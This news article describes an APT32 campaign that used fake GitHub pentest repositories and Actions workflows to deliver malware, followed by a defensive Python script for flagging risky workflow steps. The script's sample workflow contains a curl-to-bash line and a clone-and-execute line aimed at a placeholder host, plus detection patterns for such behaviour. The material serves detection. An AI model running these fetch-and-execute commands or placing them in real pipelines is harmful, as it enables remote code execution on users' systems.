APT32 (OceanLotus) has launched a novel campaign weaponizing GitHub repositories to distribute malware to cybersecurity researchers and enterprises. This operation represents a strategic shift from the group's historical focus on Southeast Asian government and corporate targets, instead exploiting the trust inherent in open-source platforms to infiltrate specialized defense communities.

The malware, detected by ThreatBook analysts as Trojan.CobaltGate, employs a multi-stage infection chain beginning with socially engineered GitHub repositories posing as legitimate penetration testing tools. These repositories contain obfuscated malicious code within PowerShell scripts and Visual Basic modules designed to bypass static analysis tools. Attackers use GitHub Issues and Discussions to promote these tools to professionals searching for red-teaming resources, creating an appearance of authenticity through fake contributor activity and star ratings.

ThreatBook researchers identified the campaign's signature tactic: weaponized repositories automatically clone and execute payloads via GitHub Actions workflows configured with encrypted triggers. This technique allows threat actors to maintain plausible deniability while enabling remote code execution through compromised GitHub accounts. It also allows the malware to blend command traffic with legitimate GitHub API calls, bypassing network monitoring tools that whitelist interactions with the platform.

ThreatBook's analysis reveals the DLL leverages API hooking to intercept security product communications, specifically targeting endpoint detection and response (EDR) solutions through forged Microsoft telemetry certificates. This reconnaissance phase collects domain architecture details and transmits them to attacker-controlled GitHub Pages sites masquerading as analytics platforms. The malware exhibits a modular architecture with components tailored for credential harvesting, lateral movement, and persistent access to enterprise networks.

With over 87 million developers using GitHub, the platform's dual role as collaboration hub and attack vector demands renewed scrutiny from enterprise security teams. Researchers urged organizations to implement code repository monitoring solutions that analyze repository contributor histories, detect anomalous API token usage patterns, and profile Actions workflow behaviors.
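As an added illustration of the "profile Actions workflow behaviors" recommendation (this is example code written for this page, not ThreatBook's tooling or anything from the campaign), the script below pulls every `run:` step out of a workflow file and flags the behaviours a reviewer would want to look at before trusting a third-party repository: remote scripts piped straight into a shell, cloned content executed in the same step, and string-evaluated or base64-decoded commands. The workflow text, URLs and pattern list are constructed for the example.

```python
import re
from typing import List, Tuple

# Constructed sample workflow (not from the article): one benign step and one
# step that fetches remote content and runs a freshly cloned script.
SAMPLE_WORKFLOW = """\
name: build
on:
  push:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: deps
        run: pip install -r requirements.txt
      - name: setup
        run: |
          curl -fsSL https://example.invalid/setup.sh | bash
          git clone https://example.invalid/helper.git /tmp/h && bash /tmp/h/run.sh
"""

# Behaviours worth a human review in CI; constructed list, extend per environment.
RISKY_PATTERNS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|)sh\b", "remote script piped to shell"),
    (r"\bgit\s+clone\b.*?(&&|;)\s*(bash|sh|python|powershell|pwsh)\b", "cloned content executed in same step"),
    (r"\b(iex|Invoke-Expression)\b", "string evaluated as PowerShell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded content"),
]

def extract_run_commands(workflow_text: str) -> List[str]:
    """Return the shell text of each `run:` step, single-line or `run: |` block.
    Deliberately line-based so no YAML library is needed; fine for triage."""
    commands, lines, i = [], workflow_text.splitlines(), 0
    while i < len(lines):
        m = re.match(r"^(\s*)(?:-\s+)?run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest in ("|", "|-", ">", ">-"):  # block scalar: take deeper-indented lines
            block, i = [], i + 1
            while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
                block.append(lines[i].strip())
                i += 1
            commands.append("\n".join(block).strip())
        else:
            commands.append(rest)
            i += 1
    return commands

def find_risky_steps(workflow_text: str) -> List[Tuple[str, str]]:
    """Return (reason, offending line) pairs for every run line matching a pattern."""
    findings = []
    for cmd in extract_run_commands(workflow_text):
        for line in cmd.splitlines():
            for pattern, reason in RISKY_PATTERNS:
                if re.search(pattern, line, flags=re.IGNORECASE):
                    findings.append((reason, line))
    return findings
```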
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 11 Apr 2025 15:20:15 +0000